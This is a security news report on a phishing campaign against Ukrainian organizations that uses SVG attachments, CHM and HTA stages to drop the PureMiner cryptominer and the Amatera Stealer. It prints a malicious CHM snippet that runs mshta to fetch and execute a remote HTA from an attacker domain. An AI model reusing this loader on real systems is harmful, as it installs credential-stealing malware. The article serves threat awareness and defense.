In recent weeks, a sophisticated phishing campaign has emerged, targeting organizations in Ukraine with malicious Scalable Vector Graphics (SVG) files designed to propagate the PureMiner cryptominer and a data-stealing payload dubbed Amatera Stealer.
Attackers masquerade as the Ukrainian police, sending emails that claim recipients have pending appeals.
When victims open the attached SVG, it triggers a fileless attack chain that ultimately compromises system confidentiality and hijacks computing resources.
This novel use of SVG attachments as initial infection vectors demonstrates attackers’ increasing creativity in bypassing traditional email filters and endpoint protections.
Upon opening the SVG attachment, an embedded HTML iframe element silently loads a second SVG from an attacker-controlled domain.
That SVG presents a spoofed Adobe Reader interface with a “Please wait, your document is loading…” message in Ukrainian, while simultaneously downloading a password-protected archive.
.webp)
Victims are shown the archive password and urged to extract a Compiled HTML Help (CHM) file. Fortinet analysts noted the malware’s reliance on this deceptive user interaction to evade detection and lure victims into executing malicious content.
Inside the archive, a CHM file contains an HTML shortcut object that invokes an HTML Application (HTA) in hidden mode.
.webp)
The HTA script, obfuscated through string encoding and array shuffling, serves as a loader—establishing a persistent connection to the attacker’s server, exfiltrating system information via XorBase64-encoded HTTP POST requests, and awaiting further commands.
Infection Mechanism of PureMiner via an SVG-Based Fileless Chain
A snippet from the malicious HTM extracted from the CHM illustrates how the Click method spawns mshta.exe to fetch and execute the next-stage payload:-
[OBJECT id="shortcut" classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width="1" height="1"]
[PARAM name="Command" value="ShortCut"]
[PARAM name="Item1" value=",cmd,/c mshta https://ms-team-ping2.com/smtp_test.hta"]
[/OBJECT]
[SCRIPT]shortcut.Click();[/SCRIPT]The infection mechanism continues with two distinct fileless payload deliveries. In the first, a ZIP archive named ergosystem.zip contains a legitimate .NET tool that sideloads a malicious DLL using process hollowing.
.webp)
The injected payload, identified as PureMiner, decrypts its configuration from a Protobuf-serialized blob, gathers hardware details using AMD and NVIDIA libraries, and initiates CPU- or GPU-based mining modules.
In the second archive, smtpB.zip, a Python interpreter and the PythonMemoryModule are leveraged to load Amatera Stealer directly into memory.
This stealer requests an RC4-encrypted configuration via HTTP GET, decodes it in memory, and parses directives to harvest credentials, browser artifacts, and cryptocurrency wallet files.
From initial SVG deployment to dual payload execution, this campaign exemplifies a seamless progression of fileless tactics and legitimate application misuse.
By weaponizing SVG files as HTML wrappers and chaining through CHM and HTA stages, attackers evade signature-based defenses and exploit users’ trust in common document formats.
Cybersecurity teams should inspect SVG attachments for embedded iframes and monitor mshta.exe invocations, while ensuring that CHM and HTA executions are restricted.
Proper URL filtering and archive password prompts coupled with endpoint behavioral analytics can disrupt this infection mechanism before it compromises data or hijacks system resources.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
